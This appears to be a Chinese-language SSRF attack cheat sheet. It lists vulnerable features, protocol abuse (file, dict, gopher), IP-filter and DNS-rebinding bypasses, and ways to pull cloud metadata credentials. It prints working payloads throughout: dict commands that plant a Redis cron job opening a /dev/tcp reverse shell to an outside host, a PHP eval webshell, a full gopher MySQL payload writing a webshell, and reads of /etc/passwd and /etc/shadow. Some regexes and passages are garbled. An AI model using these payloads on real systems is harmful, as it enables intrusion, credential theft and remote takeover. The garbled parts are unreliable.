SSRF相关

SSRF(Server Side Request Forgery,服务器端请求伪造)，攻击者以服务器的身份发送一条构造好的请求给服务器所在地内网进行探测或攻击。
产生原理：
服务器端提供了能从其他服务器应用获取数据的功能，如从指定url获取网页内容、加载指定地址的图片、数据、下载等。
例：http://xxx.com/api/readFiles?url=http://10.10.10.10/xxx

常见功能点、关键字、利用的协议
容易出现 SSRF 的功能点
一切要你输入网址的地方和可以输入ip的地方。有 URL 传参的功能点都有可能。
1、转码服务、在线翻译
● 示例 ：翻译网页内容、HTML 转 PDF、内容格式转换等
2、图片加载与下载
● 示例：通过 URL 加载图片、下载远程图片、显示头像。
3、网页内容展示、分析
● 示例：通过URL地址进行网页分享、通过URL地址把原地址的网页转换格式
4、远程资源调用
● 示例：服务器根据 url 获取资源，如 js、css、图片等
5、富文本编辑器
● 示例： UEditor、TinyMCE 自动抓取粘贴内容中的远程图片。
6、 网站采集 / 抓取功能
● 示例：爬虫任务、网页快照、资讯聚合平台。
7、 内容打包与导出
● 示例：HTML转PDF、内容封装下载。
8、 头像功能
● 示例：通过第三方 URL 加载用户头像。
9、 内容收藏 / 收藏夹功能
● 示例：收藏文章、图片时后台请求原地址。
10、 存活检测 / URL健康检查
● 示例：检测目标设备是否在线、URL是否可访问。
常见 SSRF 功能点参数
从URL关键字中寻找：
share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain
常见的利用协议
http 协议：可以直接访问 http 资源
http://www.test.com/readFiles?url=http://20.10.10.10/xxx.php

file 协议：读取文件
http://www.test.com/readFiles?url=file:///etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts //有时候会存放内网地址(静态映射)
/proc/net/arp //arp缓存c存放位置，其中保存着最近通信过的设备的 IP 地址与 MAC 地址的映射关系
/proc/net/fibn_trie //存放网络适配器地址
得到了内网地址，可以使用http协议爆破网段内的其他内网地址，然后使用dict协议进行端口探测

dict 协议：探测开放端口、主机存活
http://www.test.com/readFiles?url=dict://1000.1.22
gopher 协议：支持 GET 和 POST 请求，可进行复杂漏洞利用

当我们发现SSRF漏洞后，首先要做的事情就是测试所有可用的协议：
● http://
● file:///
● dict://
● sftp://
● ldap://
● tftp://
● gopher://
http协议
直接访问资源，探测内网主机端口、探测内网主机存活、目录扫描
http://xxx.com/ssrf_curl.php?url=http://127.0.0.1:80/xxx.php
file协议
读取本地文件
http://xxx.com/ssrf_curl.php?url=file:///D:/tools/phpstudy/phpstudy_pro/WWW/name.php
file:///etc/passwd 读取文件passwd
file:///etc/hosts 显示当前操作系统网卡的IP
file:///proc/net/arp 显示arp缓存表(寻找内网其他主机)
file:///proc/net/fib _trie 显示当前网段路由信息
dict协议
泄露安装软件版本信息、扫描端口、获取内网信息、操作内网redis服、爆破密码等
dict执行多行命令时，只能一次执行单行，需要多次执行。
一、探测端口和服务指纹
dict://127.0.0.1:3306

二、dict攻击redis:写入定时任务，反弹shell
centos系统定时任务的路径为：/var/spool/cron
debian系统定时任务的路径为：/var/spool/cron/crontabs

//使用config set命令指定redis的dbfiename为root
dict://127.0.0.1:6379/config:set:dbfilename:root
//设置redis的dir为/var/spool/cron
dict://127.0.0.1:6379/config:set:dir:/var/spool/cron
//设置一个键值对，test为键名，后面为定时任务内容
dict://127.0.0.1:6379/set:test:“\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/1234 0>&1\n\n”
//保存
dict://127.0.0.1:6379/save

三、dict攻击redis:写入webshell
dict://127.0.0.1:6379/config:set:dbfilename:test.php
dict://127.0.0.1:6379/config:set:dir:/var/www/html
dict://127.0.0.1:6379/set:test:“\n\n<?php @eval($_POST[1]);?>\n\n”
dict://127.0.0.1:6379/save
gopher协议
发送GET或POST请求、攻击内网应用(redis、fastcgi、sql、smtp等)
基本格式:
gopher://ip:port/abcd
● 由于gopher请求不转发第一个字符，要使用下划线()或其他符号填充首位。
● 在gopher协议数据流中，url编码使用%0d%0a替换字符串中的回车换行，数据流末尾使用%0d%0a代表消息结束

绕过
绕过特定限制
使用@绕过域名限制
一般用于 http://www.xxx.com 等域名不可修改的情况。
例如：http://www.xxx.com@127.0.0.1实际上访问的是 127.0.0.1
使用@绕过域名限制
403
GET /proxy?url=https:///10.10.10.10/ HTTP/1.1
Host: xxx.com
添加 @进行绕过
200
GET /proxy?url=https:///10.10.10.10@www.xxx.com/ HTTP/1.1
Host: xxx.com
成功访问到 vps:10.10.10.10
这里的 10.10.10.10可以是 vps，dnslog 等
使用/#/绕过后缀限制
一般用 png，jpg 等后缀不能更改
访问 http://10.10.10.10:5001/#/123.jpg
实际上访问的就是 http://10.10.10.10:5001

绕过请求 IP 不能为内网地址
DNS重绑定

攻击原理:
用户输入完url之后，服务器提取 url 中的host并进行dns解析为ip，然后判断ip是否在指定范围内，但是在判断得到的 ip 为指定范围内的ip，到服务器请求url这个过程中间存在一个细微的时间差。
DNS重绑定利用的就是这个时间差，让服务器第一次解析host的ip为符合的公网ip，在第二次请求解析 url时host的ip又变为不符合规则的内网ip，从而进行SSRF。
整个过程对于浏览器来说整个过程都是访问同一域名，因此认为是安全的，这就导致绕过。
可以直接使用 bp 进行并发。
在线利用网站：https://lock.cmpxchg8b.com/rebinder.html
TTL最理想的设置为0，即在第一次解析之后，立马换为我们想要访问的内网ip，但有些公共DNS服务器，比如 114.114.114.114还是会把记录进行缓存。
在某些情况下，我们甚至可以对同一个域名设置两个A记录（一个内网、一个外网），随机访问两条记录中的一个，就会有概率成功。
https://lock.cmpxchg8b.com/rebinder.html

最好在第一个填写公网地址，第二个填写内网地址。然后复制下面的url，拿到具有该漏洞的页面进行测试。例如：
http://deb7400b.7f000001.rbndr.us/flag.php

302 重定向
使用自己的vps进行重定向
使用自己搭建的vps进行重定向。
创建一个302.php文件，内容如下。

<?php header("Location: http://127.0.0.1"); exit(); ?>

如果是src，有的会给测试靶子，将ip替换即可
sudo.cc重定向
有一个sudo.cc的服务，当访问这个服务的时候，会自动重定向到127.0.0.1。
绕过时使用sudo.cc代替127.0.0.1即可。或者使用www.localtest.med代替
root@VM-8-8-ubuntu:/# ping sudo.cc -c 4
PING sudo.cc (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.026 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.034 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.033 ms

— sudo.cc ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3052ms
rtt min/avg/max/mdev = 0.026/0.032/0.036/0.003 ms
使用。代替.
http://127.0.0.1变成http://127。1。1。1，这里没有成功，
进制转换
将127.0.0.1转换成其他进制绕过检测
0177.0.0.1 //八进制
0x7f.0.0.1 //十六进制
2130706433 //十进制

127.0.0.1 点分十进制
0b01111111000000000000000000000001 二进制
017700000001 八进制
0x7F000001 十六进制
2130706433 十进制(连续)
0177.0000.0000.0001 点分八进制
0x7F.0x00.0x00.0x01 点分十六进制
0x7F.0.0.1 也可以只转一个
省略0
http://127.0.0.1变成http://127.1
root@VM-8-8-ubuntu:/# ping 127.1 -c 4
PING 127.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.036 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.038 ms

— 127.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3070ms
rtt min/avg/max/mdev = 0.028/0.033/0.038/0.003 ms
特殊0
在windows下，0代表0.0.0.0，在linux下，0代表127.0.0.1
C:\Users\40835>ping 0

正在 Ping 0.0.0.0 具有 32 字节的数据:
PING：传输失败。常见故障。
PING：传输失败。常见故障。
PING：传输失败。常见故障。
PING：传输失败。常见故障。

0.0.0.0 的 Ping 统计信息:
数据包: 已发送 = 4，已接收 = 0，丢失 = 4 (100% 丢失)，
root@VM-8-8-ubuntu:/# ping 0 -c 4
PING 0 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.032 ms

— 0 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3056ms
rtt min/avg/max/mdev = 0.030/0.033/0.038/0.003 ms
也可以尝试4位都写0：0.0.0.0
root@VM-8-8-ubuntu:/# ping 0.0.0.0 -c 4
PING 0.0.0.0 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.036 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.035 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.026 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.027 ms

— 0.0.0.0 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3073ms
rtt min/avg/max/mdev = 0.026/0.031/0.036/0.004 ms
ipv6表示法绕过
[0:0:0:0:0:ffff:127.0.0.1]是ipv6兼容ipv4的格式
http://[0:0:0:0:0:ffff:127.0.0.1]/hint.php
本地回环地址绕过
整个 127.0.0.0/8都是回环地址，使用 127.0.0.2代替 127.0.0.1，或者其他都可以尝试。
短网址绕过
利用下面这个网站，生成指定网址的短网址
https://www.985.so/
封闭式字符集
127.0.0.1
转换成
①②⑦. ⓪.⓪.①

字符集
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com

List:

① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳

⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇

⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛

⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵

Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ

ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ

⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴

⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
xip.io
10.10.10.10.xip.io会被解析成 10.10.10.10

自动化测试
常规正则匹配：
在AutoRepeater(burp 插件)中配置自动替换规则，将下面正则替换为你自己的 DNSLog 地址即可。
autoReapter中最好加入baseReplacement模块，其他模块没有反应。直接加入优化后的两个正则即可。
((https|http|file)😕/.)|((https|http|file)%3(a|A)%2(f|F)%2(f|F).)

优化正则匹配1：
(https?😕/(?:www.)?[-a-zA-Z0-9@:%.+_{#=]{1,256}.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()!@:%_+.}#?&//=]*)|https?%3(a|A)%2(f|F)%2(f|F)(?:www.)?[-a-zA-Z0-9@:%.+_{#=]{1,256}.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()!@:%_+.}#?&//=]))
(https?😕/(?:www.)?[-a-zA-Z0-9@:%._+_{#=]{1,256}.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()!@:%_+.}#?&//=])|https?%3(a|A)%2(f|F)%2(f|F)(?:www.)?[-a-zA-Z0-9@:%._+_{#=]{1,256}.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()!@:%_+.}#?&//=]*))

优化正则匹配2：
当传参中存在一个固定的相对路径，这个相对链接正常是拼接到当前域名的
POST xxx/test
xxxx
xxxx
data=[“/pic/getpicurl”]
这个目录实际上也是网站的目录，可以尝试使用@进行绕过，替换为[/pic/getpicurl@10.10.10.10]这种格式。
下面为匹配这种格式url的正则
((?:%2[fF][\w.-]+(?:%2[fF][\w.-]))(?:%3fF)?|(?😕[\w.-]+(?😕[\w.-]))(?:?([\w.%3D&=-]+))?)
((?:%2[fF][\w.-]+(?:%2[fF][\w.-]))(?:%3fF)?|(?😕[\w.-]+(?😕[\w.-]))(?:?([\w.%3D&=-]+))?)

流程
查看bp的dnslog是否收到请求，证明当前功能点可以对外发起请求
判断是否有回显
● 有回显
○ 如果是有ssrf靶子的src，直接替换成靶子的ip
○ 如果没有靶子，尝试dict协议探测127.0.0.1端口、内网ip、file协议读取敏感文件、http协议探测、gohper协议等等…
● 无回显
○ 如果有无回显的ssrf靶子，就替换成靶子的ip
○ 如果没有靶子，就使用自己的dnslog地址，使用dict协议，去探测端口，根据响应时长

利用
云上 SSRF 利用
ssrf探测src内网均失败，猜测为云服务器，于是探测元数据地址，成功回显
各大厂商的元数据地址 :
阿里云元数据地址：http://100.100.100.200/
腾讯云元数据地址：http://metadata.tencentyun.com/
华为云元数据地址：http://169.254.169.254/
亚马云元数据地址：http://169.254.169.254/
微软云元数据地址：http://169.254.169.254/
谷歌云元数据地址：http://metadata.google.internal/
将返回的base64解码，得到服务器数据，证明SSRF全回显。
腾讯云深度利用
访问元数据
http://metadata.tencentyun.com/latest/meta-data/ 获取 metadata 版本信息。

查询实例元数据。
http://metadata.tencentyun.com/latest/meta-data/placement/region

获取实例物理所在地信息。
http://metadata.tencentyun.com/latest/meta-data/local-ipv4

获取实例内⽹ IP。实例存在多张⽹卡时，返回 eth0 设备的⽹络地址。
http://metadata.tencentyun.com/latest/meta-data/public-ipv4

获取实例公⽹ IP。
http://metadata.tencentyun.com/network/interfaces/macs/${mac}/vpc-id

实例⽹络接⼝ VPC ⽹络 ID。
在获取到⻆⾊名称后，可以通过以下链接取⻆⾊的临时凭证，KaTeX parse error: Unexpected character: '' at position 86: …ta/cam/security̲credentials/{rolename}
如果配置cam的情况下，可以尝试获取用户凭证并接管。
阿里云深度利用
查看实例元数据的根目录
http://100.100.100.200/latest/meta-data

查看实例ID：
http://100.100.100.200/latest/meta-data/instance-id

访问RAM 角色的临时凭证：
http://100.100.100.200/latest/meta-data/ram/security-credentials/

获取AK SK信息
http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorpterraform-goat-role

打Redis
gopher打redis时，需要二次url编码。也可以使用gopherus

打MySQL
利用工具gopherus生成payload(需要python2环境)：https://github.com/tarunkant/Gopherus

其中有时下划线后面的内容需要再url编码一次。
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2545%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%2501%2500%2500%2500%2501
其他
可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner 信息
攻击运行在内网或本地的应用程序
对内网 WEB 应用进行指纹识别，通过访问默认文件实现(如：readme文件)
攻击内外网的 web 应用，主要是使用 GET 参数就可以实现的攻击(如：Struts2，sqli)
下载内网资源(如：利用file协议读取本地文件等)
进行跳板
无视cdn
利用Redis未授权访问，HTTP CRLF注入实现getshell